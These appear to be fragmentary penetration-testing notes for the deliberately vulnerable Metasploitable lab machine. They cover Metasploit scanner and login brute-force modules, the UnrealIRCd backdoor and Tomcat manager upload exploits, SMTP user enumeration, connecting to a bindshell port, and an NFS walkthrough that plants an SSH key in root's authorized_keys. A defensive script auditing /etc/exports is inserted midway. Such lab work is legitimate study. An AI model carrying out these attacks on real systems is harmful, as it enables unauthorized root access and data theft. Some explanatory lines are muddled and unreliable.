auxiliary/scanner/telnet/telnet_login
### Need to use Wireshark to inspect login credentials
ncat <ip> 1524
Port 25 (SMTP)
auxiliary/scanner/smtp/smtp_enum
## Verifying which users exist on the SMTP server
nc <machineIP> 25   # SMTP port
VRFY <username_Enumerated>
Port 53 ISC BIND (DNS)
Port 53 is used by DNS (Domain Name System). DNS takes care of resolving human-readable host names into numeric IP addresses. BIND (Berkeley Internet Name Domain), a commonly used DNS server, has had a rich history of security problems. As a result, BIND and port 53 are frequent targets, and a couple of worms have used BIND exploits to propagate.
The web server on Metasploitable hosts DVWA, but it can also be exploited.
nbtscan -r <IPrange>/24
dirb <ip>
http://<ip>/phpinfo.php
msf6 > use auxiliary/scanner/http/http_version
cadaver <website>/dav/
# A cadaver prompt (shell-like) should pop up
Port 111 / 2049 (RPCbind / NFS)
RPC - Remote Procedure Call; NFS - Network File System
rpcinfo -p <ip>
sudo mkdir -p /root/.ssh
cd /root/.ssh
### Generating SSH keys
ssh-keygen -t rsa -b 4096
### Mounting the filesystem
mount -o nolock -t nfs <ip>:/ /mnt
### Listing the filesystems
df -k
cd /mnt/root/.ssh
cp /root/.ssh/<publickey> /mnt/root/.ssh/
### To make an SSH connection, append the public key of the generated
key pair to the target's authorized_keys file
cat <publickey> >> authorized_keys
ssh -i /root/.ssh/<file> root@<ip>
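As a defender-side check for the weakness this NFS walkthrough relies on (the root filesystem exported to every client with root squashing disabled), here is an added example, not part of the original notes, that parses an /etc/exports file and flags risky entries; the sample exports content is constructed.

```python
"""Audit an /etc/exports file for exports that let a remote root user
write into /root/.ssh (added example; the sample data is constructed)."""
import re

# Constructed sample modelled on a Metasploitable-style export of '/' to
# everyone; not copied from any real host.
SAMPLE_EXPORTS = """\
# /etc/exports (constructed sample)
/               *(rw,no_root_squash,insecure)
/srv/share      10.0.0.0/24(ro,root_squash,sync)
/home/backup    192.168.1.5(rw,sync,no_subtree_check)
"""

def parse_exports(text):
    """Return a list of (path, client, options_set) for every client entry."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            # A spec looks like 'host(opt1,opt2)' or just 'host'.
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"
            opts = set(filter(None, (m.group(2) or "").split(",")))
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client == "*":
            findings.append((path, client, "exported to any client"))
        if "no_root_squash" in opts:
            findings.append((path, client, "root squashing disabled"))
        if path == "/":
            findings.append((path, client, "root filesystem exported"))
        if "insecure" in opts:
            findings.append((path, client, "non-privileged source ports allowed"))
        if "rw" in opts and "no_root_squash" in opts:
            findings.append((path, client, "remote root can write authorized_keys"))
    return findings

if __name__ == "__main__":
    for path, client, finding in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {finding}")
```

Run it against a copy of the server's real /etc/exports; a clean result is an empty list, and the fix for each finding is to restrict the client list, export a sub-directory rather than `/`, and keep `root_squash` (the default).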
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/mysql/mysql_login
# Brute-forcing the login yields the password
mysql -u <user> -h <ip>
### Some MySQL commands
show databases;
use <database_name>;
show tables;
describe <table_name>;   (then run a SELECT query against the table)
service postgresql start   (IRC requires a server to communicate with)
exploit/unix/irc/unreal_ircd_3281_backdoor
### IRC was built to prevent flooding
show payloads
Set the payload to the Ruby one
Port 8180 (Apache Tomcat)
Port 8180 is used by the Apache Tomcat service to run Java web applications.
A default password list for Apache Tomcat logins is available on GitHub.
exploit/multi/http/tomcat_mgr_upload